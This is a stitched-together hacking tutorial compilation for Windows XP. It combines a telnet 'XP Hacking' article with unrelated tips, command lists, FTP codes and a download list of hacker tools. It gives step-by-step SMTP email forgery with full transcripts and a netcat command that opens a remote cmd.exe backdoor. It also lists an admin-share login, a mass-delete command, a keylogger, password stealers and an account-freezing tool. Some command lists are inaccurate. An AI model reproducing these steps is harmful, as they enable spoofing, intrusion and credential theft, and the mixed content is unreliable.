XPHacking With Windows XP

$$$$$$$$ Hack XP with the use of XP $$$$$$$$$$$$

So you have the newest, glitziest, "Fisher Price" version of Windows: XP. How

can you use XP in a way that sets you apart from the boring millions of ordinary

users?

The key to doing amazing things with XP is as simple as D O S. Yes, that's

right, DOS as in MS-DOS, as in MicroSoft Disk Operating System. Windows XP (as

well as NT and 2000) comes with two versions of DOS. Command.com is an old DOS

version. Various versions of command.com come with Windows 95, 98, SE, ME,

Window 3, and DOS only operating systems.

The other DOS, which comes only with XP, 2000 and NT, is cmd.exe. Usually

cmd.exe is better than command.com because it is easier to use, has more

commands, and in some ways resembles the bash shell in Linux and other Unix-type

operating systems. For example, you can repeat a command by using the up arrow

until you back up to the desired command. Unlike bash, however, your DOS command

history is erased whenever you shut down cmd.exe. The reason XP has both

versions of DOS is that sometimes a program that won?t run right in cmd.exe will

work in command.com

note : m not comparing bash to dos

DOS is your number one Windows gateway to the Internet, and the open sesame to

local area networks. From DOS, without needing to download a single hacker

program, you can do amazingly sophisticated explorations and even break into

poorly defended computers.

****************

You can go to jail warning: Breaking into computers is against the law if you do

not have permission to do so from the owner of that computer. For example, if

your friend gives you permission to break into her Hotmail account, that won't

protect you because Microsoft owns Hotmail and they will never give you

permission.

****************

****************

You can get expelled warning: Some kids have been kicked out of school just for

bringing up a DOS prompt on a computer. Be sure to get a teacher's WRITTEN

permission before demonstrating that you can hack on a school computer.

****************

So how do you turn on DOS?

Click All Programs -> Accessories -> Command Prompt

That runs cmd.exe. You should see a black screen with white text on it, saying

something like this:

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Your first step is to find out what commands you can run in DOS. If you type

"help" at the DOS prompt, it gives you a long list of commands. However, this

list leaves out all the commands hackers love to use. Here are some of those

left out hacker commands.

TCP/IP commands:

telnet

netstat

nslookup

tracert

ping

ftp

NetBIOS commands (just some examples):

nbtstat

net use

net view

net localgroup

TCP/IP stands for transmission control protocol/Internet protocol. As you can

guess by the name, TCP/IP is the protocol under which the Internet runs. along

with user datagram protocol (UDP). So when you are connected to the Internet,

you can try these commands against other Internet computers. Most local area

networks also use TCP/IP.

NetBIOS (Net Basic Input/Output System) protocol is another way to communicate

between computers. This is often used by Windows computers, and by Unix/Linux

type computers running Samba. You can often use NetBIOS commands over the

Internet (being carried inside of, so to speak, TCP/IP). In many cases, however,

NetBIOS commands will be blocked by firewalls. Also, not many Internet computers

run NetBIOS because it is so easy to break in using them. I will cover NetBIOS

commands in the next article to XP Hacking.

The queen of hacker commands is telnet. To get Windows help for telnet, in the

cmd.exe window give the command:

C:\>telnet /?

Here's what you will get:

telnet [-a][-e escape char][-f log file][-l user][-t term][host

[port]]

-a Attempt automatic logon. Same as --l option except uses the currently logged

on user's name.

-e Escape character to enter telnet cclient prompt.

-f File name for client side logging

-l Specifies the user name to log in with on the remote system. Requires that

the remote system support the TELNET ENVIRON option.

-t Specifies terminal type. Supportedd term types are vt100, vt52, ansi and vtnt

only.

host Specifies the hostname or IP address of the remote computer to connect to.

port Specifies a port number or service name.

****************

Newbie note: what is a port on a computer? A computer port is sort of like a

seaport. It's where things can go in and/or out of a computer. Some ports are

easy to understand, like keyboard, monitor, printer and modem. Other ports are

virtual, meaning that they are created by software. When that modem port of

yours (or LAN or ISDN or DSL) is connected to the Internet, your computer has

the ability to open or close any of over 65,000 different virtual ports, and has

the ability to connect to any of these on another computer - if it is running

that port, and if a firewall doesn?t block it.

****************

****************

Newbie note: How do you address a computer over the Internet? There are two

ways: by number or by name.

****************

The simplest use of telnet is to log into a remote computer. Give the command:

C:/>telnet targetcomputer.com (substituting the name of the computer you want to

telnet into for targetcomputer.com)

If this computer is set up to let people log into accounts, you may get the

message:

login:

Type your user name here, making sure to be exact. You can't swap between lower

case and capital letters. For example, user name Guest is not the same as guest.

****************

Newbie note: Lots of people email me asking how to learn what their user name

and password are. Stop laughing, darn it, they really do. If you don't know your

user name and password, that means whoever runs that computer didn't give you an

account and doesn't want you to log on.

****************

Then comes the message:

Password:

Again, be exact in typing in your password.

What if this doesn't work?

Every day people write to me complaining they can't telnet. That is usually

because they try to telnet into a computer, or a port on a computer that is set

up to refuse telnet connections. Here's what it might look like when a computer

refuses a telnet connection:

C:\ >telnet 10.0.0.3

Connecting To 10.0.0.3...Could not open connection to the host, on port 23. A

connection attempt failed because the connected party did not properly respond

after a period of time, or established connection failed because connected host

has failed to respond.

Or you might see:

C:\ >telnet hotmail.com

Connecting To hotmail.com...Could not open connection to the host, on port

23. No connection could be made because the target machine actively refused it.

If you just give the telnet command without giving a port number, it will

automatically try to connect on port 23, which sometimes runs a telnet server.

**************

Newbie note: your Windows computer has a telnet client program, meaning it will

let you telnet out of it. However you have to install a telnet server before

anyone can telnet into port 23 on your computer.

*************

If telnet failed to connect, possibly the computer you were trying to telnet

into was down or just plain no longer in existence. Maybe the people who run

that computer don't want you to telnet into it.

Even though you can't telnet into an account inside some computer, often you can

get some information back or get that computer to do something interesting for

you. Yes, you can get a telnet connection to succeed -without doing anything

illegal --against almost any computer, even if you don't have permission to log

in. There are many legal things you can do to many randomly chosen computers

with telnet. For example:

C:/telnet freeshell.org 22

SSH-1.99-OpenSSH_3.4p1

That tells us the target computer is running an SSH server, which enables

encrypted connections between computers. If you want to SSH into an account

there, you can get a shell account for free at http://freeshell.org . You can

get a free SSH client program from http://winfiles.com .

***************

You can get punched in the nose warning: Your online provider might kick you off

for making telnet probes of other computers. The solution is to get a local

online provider and make friends with the people who run it, and convince them

you are just doing harmless, legal explorations.

*************

Sometimes a port is running an interesting program, but a firewall won't let you

in. For example, 10.0.0.3, a computer on my local area network, runs an email

sending program, (sendmail working together with Postfix, and using Kmail to

compose emails). I can use it from an account inside 10.0.0.3 to send emails

with headers that hide from where I send things.

If I try to telnet to this email program from outside this computer, here's what

happens:

C:\>telnet 10.0.0.3 25

Connecting To 10.0.0.3...Could not open connection to the host, on port 25. No

connection could be made because the target machine actively refused it.

However, if I log into an account on 10.0.0.3 and then telnet from inside to

port 25, here's what I get:

Last login: Fri Oct 18 13:56:58 2002 from 10.0.0.1

Have a lot of fun...

cmeinel@test-box:~> telnet localhost 25

Trying ::1...

telnet: connect to address ::1: Connection refused

Trying 127.0.0.1... [Carolyn's note: 127.0.0.1 is the numerical address meaning

localhost, the same computer you are logged into]

Connected to localhost.

Escape character is '^]'.

220 test-box.local ESMTP Postfix

The reason I keep this port 25 hidden behind a firewall is to keep people from

using it to try to break in or to forge email. Now the ubergeniuses reading this

will start to make fun of me because no Internet address that begins with 10. is

reachable from the Internet. However, sometimes I place this "test-box" computer

online with a static Internet address, meaning whenever it is on the Internet,

it always has the same numerical address. I'm not going to tell you what its

Internet address is because I don't want anyone messing with it. I just want to

mess with other people's computers with it, muhahaha. That's also why I always

keep my Internet address from showing up in the headers of my emails.

***************

Newbie note: What is all this about headers? It's stuff at the beginning of an

email that may - or may not - tell you a lot about where it came from and when.

To see full headers, in Outlook click view -> full headers. In Eudora, click the

"Blah blah blah" icon.

****************

Want a computer you can telnet into and mess around with, and not get into

trouble no matter what you do to it? I've set up my techbroker.com

(206.61.52.33) with user xyz, password guest for you to play with. Here's how to

forge email to xyz@techbroker.com using telnet. Start with the command:

C:\>telnet techbroker.com 25

Connecting To Techbroker.com

220 Service ready

Now you type in who you want the message to appear to come from:

helo santa@techbroker.com

Techbroker.com will answer:

250 host ready

Next type in your mail from address:

mail from:santa@techbroker.com

250 Requested mail action okay, completed

Your next command:

rcpt to:xyz@techbroker.com

250 Requested mail action okay, completed

Your next command:

data

354 Start main input; end with .

just means hit return. In case you can't see that little

period between the s, what you do to end composing your email is to hit

enter, type a period, then hit enter again. Anyhow, try typing:

This is a test.

.

250 Requested mail action okay, completed

quit

221 Service closing transmission channel

Connection to host lost.

Using techbroker's mail server, even if you enable full headers, the message we

just composed looks like:

Status: R

X-status: N

This is a test.

That's a pretty pathetic forged email, huh? No "from", no date. However, you can

make your headers better by using a trick with the data command. After you give

it, you can insert as many headers as you choose. The trick is easier to show

than explain:

220 Service ready

helo santa@northpole.org

250 host ready

mail from:santa@northpole.com

250 Requested mail action okay, completed

rcpt to:cmeinel@techbroker.com

250 Requested mail action okay, completed

data

354 Start main input; end with .

from:santa@deer.northpole.org

Date: Mon, 21 Oct 2002 10:09:16 -0500

Subject: Rudolf

This is a Santa test.

.

250 Requested mail action okay, completed

quit

221 Service closing transmission channel

Connection to host lost.

The message then looks like:

from:santa@deer.northpole.org

Date: Mon, 21 Oct 2002 10:09:16 -0500

Subject: Rudolf

This is a Santa test.

The trick is to start each line you want in the headers with one word followed

by a colon, and the a line followed by "return". As soon as you write a line

that doesn't begin this way, the rest of what you type goes into the body of the

email.

Notice that the santa@northpole.com from the "mail from:" command didn't show up

in the header. Some mail servers would show both "from" addresses.

You can forge email on techbroker.com within one strict limitation. Your email

has to go to someone at techbroker.com. If you can find any way to send email to

someone outside techbroker, let us know, because you will have broken our

security, muhahaha! Don't worry, you have my permission.

Next, you can read the email you forge on techbroker.com via telnet:

C:\>telnet techbroker.com 110

+OK <30961.5910984301@techbroker.com> service ready

Give this command:

user xyz

+OK user is known

Then type in this:

pass test

+OK mail drop has 2 message(s)

retr 1

+OK message follows

This is a test.

If you want to know all possible commands, give this command:

help

+OK help list follows

USER user

PASS password

STAT

LIST [message]

RETR message

DELE message

NOOP

RSET

QUIT

APOP user md5

TOP message lines

UIDL [message]

HELP

Unless you use a weird online provider like AOL, you can use these same tricks

to send and receive your own email. Or you can forge email to a friend by

telnetting to his or her online provider's email sending computer(s).

With most online providers you need to get the exact name of their email

computer(s). Often it is simply mail.targetcomputer.com (substitute the name of

the online provider for targetcomputer). If this doesn't work, you can find out

the name of their email server with the DOS nslookup program, which only runs

from cmd.exe. Here's an example:

C:\ >nslookup

Default Server: DNS1.wurld.net

Address: 206.61.52.11

> set q=mx

> dimensional.com

Server: DNS1.wurld.net

Address: 206.61.52.11

dimensional.com MX preference = 5, mail exchanger =

mail.dimensional.com

dimensional.com MX preference = 10, mail exchanger =

mx2.dimensional.com

dimensional.com MX preference = 20, mail exchanger =

mx3.dimensional.com

dimensional.com nameserver = ns.dimensional.com

dimensional.com nameserver = ns-1.dimensional.com

dimensional.com nameserver = ns-2.dimensional.com

dimensional.com nameserver = ns-3.dimensional.com

dimensional.com nameserver = ns-4.dimensional.com

mail.dimensional.com internet address = 206.124.0.11

mx2.dimensional.com internet address = 206.124.0.30

mx3.dimensional.com internet address = 209.98.32.54

ns.dimensional.com internet address = 206.124.0.10

ns.dimensional.com internet address = 206.124.26.254

ns.dimensional.com internet address = 206.124.0.254

ns.dimensional.com internet address = 206.124.1.254

ns.dimensional.com internet address = 209.98.32.54

ns.dimensional.com internet address = 206.124.0.32

ns.dimensional.com internet address = 206.124.0.30

ns.dimensional.com internet address = 206.124.0.25

ns.dimensional.com internet address = 206.124.0.15

ns.dimensional.com internet address = 206.124.0.21

ns.dimensional.com internet address = 206.124.0.9

ns-1.dimensional.com internet address = 206.124.26.254

ns-2.dimensional.com internet address = 209.98.32.54

ns-3.dimensional.com internet address = 206.124.1.254

ns-4.dimensional.com internet address = 206.124.0.254

>

The lines that tell you what computers will let you forge email to people with

@dimensional.com addresses are:

dimensional.com MX preference = 5, mail exchanger =

mail.dimensional.com

dimensional.com MX preference = 10, mail exchanger =

mx2.dimensional.com

dimensional.com MX preference = 20, mail exchanger =

mx3.dimensional.com

MX stands for mail exchange. The lower the preference number, the more they

would like you to use that address for email.If that lowest number server is too

busy, then try another server.

Sometimes when you ask about a mail server, nslookup will give you this kind of

error message:

DNS request timed out.

timeout was 2 seconds.

DNS request timed out.

timeout was 2 seconds.

*** Request to [207.217.120.202] timed-out

To get around this problem, you need to find out what are the domain servers for

your target online provider. A good place to start looking is

http://netsol.com/cgi-bin/whois/whois . If this doesn't work, see

http://happyhacker.org/HHA/fightback.shtml for how to find the domain servers

for any Internet address.

****************

Newbie note: A domain name server provides information on the names and numbers

assigned to computers on the Internet. For example, dns1.wurld.net and

dns2.wurld.net contain information on happyhacker.org, techbroker.com,

securitynewsportal.com, thirdpig.com and sage-inc.com. When you query

dns1.wurld.net about other computers, it might have to go hunting for that

information from other name servers. That's why you might get a timed out

failure.

***************

Once you know the domain servers for an online service, set one of them for the

server for your nslookup program. Here's how you do it:

C:\ >nslookup

Default Server: DNS1.wurld.net

Address: 206.61.52.11

Now give the command:

> server 207.217.126.41

Default Server: ns1.earthlink.net

Address: 207.217.126.41

Next command should be:

> set q=mx

> earthlink.net

Server: ns1.earthlink.net

Address: 207.217.126.41

earthlink.net MX preference = 5, mail exchanger = mx04.earthlink.net

earthlink.net MX preference = 5, mail exchanger = mx05.earthlink.net

earthlink.net MX preference = 5, mail exchanger = mx06.earthlink.net

earthlink.net MX preference = 5, mail exchanger = mx00.earthlink.net

earthlink.net MX preference = 5, mail exchanger = mx01.earthlink.net

earthlink.net MX preference = 5, mail exchanger = mx02.earthlink.net

earthlink.net MX preference = 5, mail exchanger = mx03.earthlink.net

earthlink.net nameserver = ns3.earthlink.net

earthlink.net nameserver = ns1.earthlink.net

earthlink.net nameserver = ns2.earthlink.net

mx00.earthlink.net internet address = 207.217.120.28

mx01.earthlink.net internet address = 207.217.120.29

mx02.earthlink.net internet address = 207.217.120.79

mx03.earthlink.net internet address = 207.217.120.78

mx04.earthlink.net internet address = 207.217.120.249

mx05.earthlink.net internet address = 207.217.120.31

mx06.earthlink.net internet address = 207.217.120.23

ns1.earthlink.net internet address = 207.217.126.41

ns2.earthlink.net internet address = 207.217.77.42

ns3.earthlink.net internet address = 207.217.120.43

>

Your own online service will usually not mind and may even be glad if you use

telnet to read your email. Sometimes a malicious person or faulty email program

will send you a message that is so screwed up that your email program can't

download it. With telnet you can manually delete the bad email. Otherwise tech

support has to do it for you.

If you think about it, this ability to forge email is a huge temptation to

spammers. How can your online provider keep the bad guys from filling up a

victim's email box with garbage? The first time a bad guy tries this, probably

nothing will stop him or her. The second time the online provider might block

the bad guy at the firewall, maybe call the bad guy's online provider and kick

him or her and maybe get the bad guy busted or sued.

**************

You can go to jail warning: Sending hundreds or thousands of junk emails to bomb

someone's email account is a felony in the US.

***************

***************

You can get sued warning: Spamming, where you send only one email to each

person, but send thousands or millions of emails, is borderline legal. However,

spammers have been successfully sued when they forge the email addresses of

innocent people as senders of their spam.

****************

Now that you know how to read and write email with telnet, you definitely have

something you can use to show off with. Happy hacking!

Oh, here's one last goodie for advanced users. Get netcat for Windows. It's a

free program written by Weld Pond and Hobbit, and available from many sites, for

example

http://www.atstake.com/research/tools/#network_utilities . It is basically

telnet on steroids. For example, using netcat, you can set up a port on your

Windows computer to allow people to telnet into a DOS shell by using this

command:

C:\>nc -L -p 5000 -t -e cmd.exe

You can specify a different port number than 5000. Just make sure it doesn't

conflict with another port by checking with the netstat command. Then you and

your friends, enemies and random losers can either telnet in or netcat in with

the command:

C:\>nc -v [ipaddress of target] [port]

Of course you will probably get hacked for setting up this port. However, if you

set up a sniffer to keep track of the action, you can turn this scary back door

into a fascinating honeypot. For example, you could run it on port 23 and watch

all the hackers who attack with telnet hoping to log in. With some programming

you could even fake a unix-like login sequence and play some tricks on your

attackers

Speed Up U R Start Up

Speed up your start menu

The default setting of Windows causes a slight delay when opening the sub categories of the start menu. That is why we need to hover the mouse on it for about half a second. You can change this default setting by following these steps.

1. Go to start----> run----> Type regedit. Press enter.

2. Navigate to HKEY_CURRENT_USER----> Control Panel.

3. Click on Desktop.

4. On the right pane look out for 'MenuShowDelay'. ( If you can't find it right-click and create a new 'Multi-String Value' and rename it as MenuShowDelay )

5. The default setting is 400.

6. Double click it to modify it.

7. Set it to 0 and there will be no delay.

8. Exit registry and reboot.

However making it zero makes it difficult to move the mouse without accidentally opening other folders. So try giving some lower values and choose the one which best suits you.

Hiding Folder In Xp

Right Click on the desktop.Make a new folder

2)Now rename the folder with a space(U have to hold ALT key and type 0160).

3)Now u have a folder with out a name.

4)Right click on the folder>properties>customize. Click on change icon.

5)Scroll a bit, u should find some empty spaces, Click on any one of them.click ok

Thats it, now u can store ur personal data without any 3rd party tools.

U can also hide ur folder by dis method:-

open Start>Run>CMD

now type attrib +s +h C:/name of d folder u want to hide

Now even in the folder option Show all Hide folders is slected still u will get dis folder hide...

And to unhide type same command juzz put "-" instead of "+"

Hide your hard drives

HOW TO HIDE UR HARD DRIVES WITHOUT ANY REGISTERY EDIT

1.First goto start->run->type “diskpart” and enter(with out quotations)

2.Type “list volume” (with out quotations)

3.select the volume of drive u want to hide by this command “select volume3” (with out quotations)

4.Then type “remove letter f” (with out quotations)

(It removes the drive f)

5.If u want re-assign the drive

a. First goto start->run->type “diskpart” and enter(with out quotations)

b. Type “list volume” (with out quotations)

c. select the volume of drive u (before) hide by this command “select

volume3” (with out quotations)

d.THEN type “assign letter f” (with out quotations)

EXAMPLE:

DISKPART> list volume

Volume ### Ltr Label Fs Type Size Status Info

---------- --- ----------- ----- ---------- ------- --------- --------

Volume 0 D DVD-ROM 0 B

Volume 1 C NTFS Partition 20 GB Healthy System

Volume 2 E New Volume NTFS Partition 49 GB Healthy

Volume 3 F New Volume NTFS Partition 78 GB Healthy

Volume 4 G New Volume NTFS Partition 86 GB Healthy

Volume 5 H SUBBU FAT32 Removeable 978 MB

DISKPART> select volume 3

Volume 3 is the selected volume.

DISKPART> remove letter f

DiskPart successfully removed the drive letter or mount point.

DISKPART> select volume 3

Volume 3 is the selected volume.

DISKPART> assign letter f

DiskPart successfully assigned the drive letter or mount point.

Hidden programs - XP

1- Private Character Editor

This program is for designing icons and Characters(Alphapet)

Click :start

Then :run

type :EUDCEDIT

2- iExpress

This Program is for conerting your files to EXCUTABLE files

Click : start

Then : run

type : iexpress

3-Disk Cleanup

This program used for cleaning harddisk to offer space

Click : start

Then : run

type : cleanmgr

4-Dr Watson

This program Is for repairing problems in Windows

Click : start

Then : run

type : drwtsn32

5-Windows Media Player 5.1

Opens the old media player

Click : start

Then : run

type : mplay32

Program ............. CODE

__________ __________

Character Map = charmap

DirectX diagnosis = dxdiag

Object Packager = packager

System Monitor = perfmon

Program Manager = progman

Remote Access phone book = rasphone

Registry Editor = regedt32

File siganture verification tool = sigverif

Volume Contro = sndvol32

System Configuration Editor = sysedit

Syskey = syskey

Microsoft Telnet Client = telnet

Hidden dos commands

There are some hidden dos commands which u can't recognise by typing help in cmd

CTTY

Change the computers input/output devices.

DATE

View or change the systems date.

DEBUG

Debug utility to create assembly programs to modify hardware settings.

DEFRAG

Re-arrange the hard disk drive to help with loading programs.

DELTREE

Deletes one or more files and/or directories.

DISABLE

Recovery console command that disables Windows system services or drivers.

DISKCOMP

Compare a disk with another disk.

DISKCOPY

Copy the contents of one disk and place them on another disk.

DOSKEY

Command to view and execute commands that have been run in the past.

DOSSHELL

A GUI to help with early MS-DOS users.

DRIVPARM

Enables overwrite of original device drivers.

ECHO

Displays messages and enables and disables echo.

EDIT

View and edit files.

EDLIN

View and edit files.

EMM386

Load extended Memory Manager.

ENABLE

Recovery console command to enable a disable service or driver.

ENDLOCAL

Stops the localization of the environment changes enabled by the setlocal command.

ERASE

Erase files from computer.

EXPAND

Expand a Microsoft Windows file back to it's original format.

EXTRACT

Extract files from the Microsoft Windows cabinets.

FASTHELP

Displays a listing of MS-DOS commands and information about them.

FC

Compare files.

FDISK

Utility used to create partitions on the hard disk drive.

FIND

Search for text within a file.

FINDSTR

Searches for a string of text within a file.

FIXBOOT

Writes a new boot sector.

FIXMBR

Writes a new boot record to a disk drive.

FOR

Boolean used in batch files.

FORMAT

Command to erase and prepare a disk drive.

FTP

Command to connect and operate on a FTP server.

FTYPE

Displays or modifies file types used in file extension associations.

GOTO

Moves a batch file to a specific label or location.

Common FTP Error Codes

# Description

110 Restart marker reply. In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and "=").

120 Service ready in nnn minutes.

125 Data connection already open; transfer starting.

150 File status okay; about to open data connection.

200 Command okay.

202 Command not implemented, superfluous at this site.

211 System status, or system help reply.

212 Directory status.

213 File status.

214 Help message.On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user.

215 NAME system type. Where NAME is an official system name from the list in the Assigned Numbers document.

220 Service ready for new user.

221 Service closing control connection.

225 Data connection open; no transfer in progress.

226 Closing data connection. Requested file action successful (for example, file transfer or file abort).

227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).

230 User logged in, proceed. Logged out if appropriate.

250 Requested file action okay, completed.

257 "PATHNAME" created.

331 User name okay, need password.

332 Need account for login.

350 Requested file action pending further information

421 Service not available, closing control connection.This may be a reply to any command if the service knows it must shut down.

425 Can't open data connection.

426 Connection closed; transfer aborted.

450 Requested file action not taken.

451 Requested action aborted. Local error in processing.

452 Requested action not taken. Insufficient storage space in system.File unavailable (e.g., file busy).

500 Syntax error, command unrecognized. This may include errors such as command line too long.

501 Syntax error in parameters or arguments.

502 Command not implemented.

503 Bad sequence of commands.

504 Command not implemented for that parameter.

530 Not logged in.

532 Need account for storing files.

550 Requested action not taken. File unavailable (e.g., file not found, no access).

551 Requested action aborted. Page type unknown.

552 Requested file action aborted. Exceeded storage allocation (for current directory or dataset).

553 Requested action not taken. File name not allowed.

CMD Explanation

For use in command prompt on you own computer, hacking, network

* CMD or command.com = use whichever works best or whichever one is available ( to open command prompt in the run command.

* EXIT = exit the command prompt

* PATH = displays the places that if will look for if not in the name first

* CLS = clears up everything on command prompt page

* TIME = displays time and you can change it if you want

* HELP = displays help, more commands

* DIR OR DIR /? = Shows a lot of information

* CD\PROGRA~1 ENTER THEN DIR = Programs installed (1)

* CD\ ENTER THEN DIR = shows installations of programs

* (DEL OR COPY OR DIR) *.* C:\TARGET = you can either delete, copy or dir a program

* NET = you get options to use it

* SHUTDOWN –LETTER OR SHUTDOWN/? = you can shutdown

free page hit counter

Your computer or another computer

* NETSTAT = view the stats of the computers one feature is

to get people’s I.P. for more type netstat/?

* FSUTIL AND FSUTIL FSINFO = shows you things like list of

all drives

* IPCONFIG OR IPCONFIG/ALL = shows you I.P. and all others

in a network

* ERASE C:\PROGRAM FILES = erases all program files or leave

just the c delete everything

* NBTSTAT = GETTING INFORMATION ON YOUR COMPUTER

AND OTHERS

* TREE = displays all files on program files and desktop good

for seeing if you have any keyloggers

* TRACERT (IP) = to see if the I.P. exist

* NET USE C: \\PCNAME\C$ /USER: PCNAME\ADMINISTRATOR

= to sign in as an administrator that’s not signed in

* NSLOOKUP SET TYPE=MX EXP:HOTMAIL.COM = getting ips

from web sites

* /WHOIS (SCREENAME) = only on a chat room, to find

information a that person which owns the screename an I.P.

For use in command prompt for path chanching

* DISKPART = shows you stuff like the computer name and

takes you to disk part option

* CD\PROGRA~1 ENTER THEN DIR = Programs installed (2)

* CD \WINDOWS \SYSTEM = to look for stuff in this folders

* TELNET : remote controlling

* NET START MESSENGER = start net send when it is disable

For use in command prompt only on a network or hacking

* BOOTCFG = you can make changes to boot the computer ,

boot it mess it up

* GPRESULT = shows all the information of a computer

* DRIVERQUERY = list of drives and their properties

* GETMAC = this gets the Mac (media access control) address

* NETSH = good for hacking a network configuration tool

type netsh /? For more

* OPENFILES = only for windows professional allows an

administrator to display or disconnect open files

* REG = THE CONSOLE REGISTRY TOOL

* SYSTEMINFO = info

* TASKLIST AND TASKKILL = LIKE PRESING CTRL+ALT+DELETE

Shutdown Windows Using Virus

Run -> cmb -> shutdown -a

This prevent the shutdown.

create a new shortcut.. then write;

shutdown -s -t 0 = this is for shut down in 0 seconds (t = time s=shutdown)

shutdown -r -t 0 = same but this is for restart comp. in 0 seconds..

(only for windows xp)

Here is 99 run commands

Add Hardware Wizard

hdwwiz.cpl

Add/Remove Programs

appwiz.cpl

Administrative Tools

control admintools

Automatic Updates

wuaucpl.cpl

Bluetooth Transfer Wizard

fsquirt

Calculator

calc

Certificate Manager

certmgr.msc

Character Map

charmap

Check Disk Utility

chkdsk

Clipboard Viewer

clipbrd

Command Prompt

cmd

Component Services

dcomcnfg

Computer Management

compmgmt.msc

Date and Time Properties

timedate.cpl

DDE Shares

ddeshare

Device Manager

devmgmt.msc

Direct X Control Panel (If Installed)*

directx.cpl

Direct X Troubleshooter

dxdiag

Disk Cleanup Utility

cleanmgr

Disk Defragment

dfrg.msc

Disk Management

diskmgmt.msc

Disk Partition Manager

diskpart

Display Properties

control desktop

Display Properties

desk.cpl

Display Properties (w/Appearance Tab Preselected)

control color

Dr. Watson System Troubleshooting Utility

drwtsn32

Driver Verifier Utility

verifier

Event Viewer

eventvwr.msc

File Signature Verification Tool

sigverif

Findfast

findfast.cpl

Folders Properties

control folders

Fonts

control fonts

Fonts Folder

fonts

Free Cell Card Game

freecell

Game Controllers

joy.cpl

Group Policy Editor (XP Prof)

gpedit.msc

Hearts Card Game

mshearts

Iexpress Wizard

iexpress

Indexing Service

ciadv.msc

Internet Properties

inetcpl.cpl

IP Configuration (Display Connection Configuration)

ipconfig /all

IP Configuration (Display DNS Cache Contents)

ipconfig /displaydns

IP Configuration (Delete DNS Cache Contents)

ipconfig /flushdns

IP Configuration (Release All Connections)

ipconfig /release

IP Configuration (Renew All Connections)

ipconfig /renew

Hacker tools

Well, now we are very much familiar with use of search engines, what u actually need is just

d name of the utility and tool name to try ur hands upon

well m listing down some such tools, use search engines in full strength and did info out.

my main motto here is to make u aware of such tools for educational purpose

and preventing u with severe use of such tools.

regards

Rahul

http://rahulhackingarticles.wetpaint.com/

fEvicol v1.0

fEvicol v1.0 is a simple executable(exe)+JPEG image(jpg) binder. The icon of the binded executable is configurable, Lauches both the executable and picture when lauched. Check ReadMe.txt for more details.

MSN Password Finder v2.0 for Win XP/2003

MSN Password Finder v2.0 for Windows XP & 2003, reveals the stored[saved] MSN Messenger Password on the computer. This new version is compatible with the new-method of storing passwords. Tested on WinXP SP2 with MSN Messenger 7.0

RediffMail Notifier

RediffMail Notifier is a small utility that alerts you when new e-mails arrive in your rediffmail inbox, by checking your account regularly while sitting in the system tray. It requires Microsoft .NET Runtime. Screenshot

Password Revealer For Internet Explorer

Password Revealer for Internet Explorer reveals whats behind the asterisks (***) in a web-page. Can be used to viewing password that has just been typed in password-field (see Screensot). Requires Microsoft .NET Runtime. Screenshot

peck v1.0

peck v1.0 is PE [Portable Executable] Signature Scanner - Detects Packers / Cryptors / Compilers etc..

Password-Revealer

Password Revealer ( less than 5KB in size ) is a useful utiltity that reveals the password stored behind the asterisks ("****") in ordinary password fields. Works in Windows 9x,2000,XP,2003 Screenshot

TinyWebCamViewer

Tiny Web Cam Viewer (2.26KB in size), is a pocket sized utility that you can use to view through your webcam. Screenshot

CPU-iNFO

Displays CPU Information - Requires Microsoft .NET Framework

WHOIS-iNFO

Displays WHOIS Information of a domain-name, like information about www.microsoft.com - Requires Microsoft .NET Framework

MSN Password Finder v1.0

Finds the MSN Messenger Password stored on your computer. Works only in cases where the current-user has chosen to remember the pass in MSN Messenger. Works with MSN Messenger 6.x, 7.x .. Tested on Win2K, WinXP. Njoi!!

SixthSense [RC2]

SixthSense RC2 [Release Candidate 2] Has Now IP Address revealing function. It exploits a flaw found in MSN Messenger 6.0 or lower, or Windows Messenger to get the IP Address. [Use a Sniffer and find out what the program is doing ;), don't mail me asking for it ]

SixthSense [RC1]

SixthSense can be used to find the real status of a MSN Messenger user. The method used here is flawless! More functions to be added to SixthSense.

IceCold ReLoaded

IceCold ReLoaded has the same functionality IceCold, but has been updated with the new msn protocol. IceCold ReLoaded is capable of locking or freezing an MSN Passport Account (@hotmail.com, @msn.com etc..). This person won't be able to access his/her hotmail account, sign into msn messenger etc.. is IceCold ReLoaded is launched on his/her account. The person can resume the normal activities as soon as IceCold ReLoaded is stopped.

Due to the unethical nature of this program, I would advice the users to use the program wisely.

IceCold (Obsolete)

IceCold can be used to Freeze an MSN Passport Account. Can disallow a person from accessing his hotmail mailbox, msn messenger etc.. Please use IceCold ReLoaded for the purpose.. this version has been posted here only for historical purposes.

FUn WIth MSN v1.0

Add fake plugins/application names to your MSN Messenger to have some fun with your MSN Buddies...

CusExt

CusExt is a simple program to associate an extension with a program.

Avril

Avril is a simple multi-threaded bulk mailer. Highly Buggy S/W!!

Avril Source Code - zip file is password protected.. break it (its really easy_.. and have the source code.. don't mail me asking for the password..

Kutty

The World's Smallest PE [ Portable Executable]. Its only 513 bytes in size!! Tested in Win98SE & WinXP..

Chota

Chota Add-On -by- da_neural

The World's Smallest Keylogger!! Its only 724 bytes!! It logs the keys to C:.SYS. Please read Info.txt ( in chota.zip ) for more information on this tiny keylogger! :)

BIOS Password Remover

The program tries to remove the bios password. It seems to work only in AWARD bios and a few older older bios. Please read the ReadMe.txt before using the program.. Author takes no responsibility for any damage caused by the use of this program!! Works in Win9x/ME ONLY!!!

MSN Password Decryptor v2.0 (Obsolete)

Decrypts the encrypted password stored in the registry. Works only in cases where you've chosen to remember the pass in MSN Messenger. (Now. Works with newer MSN version.. tested it on Win98SE only!!)

RoBis v1.0

RoBis is a simple anonymous mailer with a special feature that you needn't specify an SMTP Server to send a mail. RoBis queries the DNS server for mail exchange server of the receipient's e-mail address and sends it..

It works on most servers.. i tested it on yahoo, hotmail, rediffmail, gmx, vsnl, sify and eth accounts.. :D

Hanuman Server

Hanuman Server is a simple daemon that runs on port 3333 (0xD05) which give a DOS Shell to anyone who connects to that port..

PortScan

PortScan is a simple port scanner that scans about 28 know ports under port no. 127.. it may fail in slow internet connections :(

Gorgons

[ Boring Saturday Evening Product ]

It just kills the foreground window, in case it has any of the keywords specified in Gorgons.txt ( editable ). It doesn't install itself, so, you'll have to put a short cut in startup folder or modify the registry. It can be used to kill pop-up ads, porno sites etc..

KillSSKC

